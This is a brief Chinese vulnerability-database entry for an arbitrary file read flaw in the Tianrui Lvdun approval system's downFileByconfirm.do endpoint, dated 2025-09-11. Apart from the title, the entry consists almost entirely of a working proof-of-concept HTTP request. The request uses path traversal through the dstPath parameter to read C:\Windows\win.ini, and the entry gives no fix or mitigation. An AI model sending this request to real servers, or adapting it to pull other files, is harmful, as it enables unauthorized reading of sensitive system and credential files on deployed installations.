天锐绿盾审批系统 downFileByconfirm.do 任意文件读取漏洞

日期: 2025-09-11 | 影响软件: 天锐绿盾审批系统 | POC: 已公开

漏洞描述

天锐绿盾审批系统 downFileByconfirm.do 任意文件读取漏洞

PoC代码

GET /trwfe/service/.%2E/file/downFileByconfirm.do?dstPath=C:\Windows\win.ini&fileName=&processInstanceIds= HTTP/1.1
Host: 

相关漏洞推荐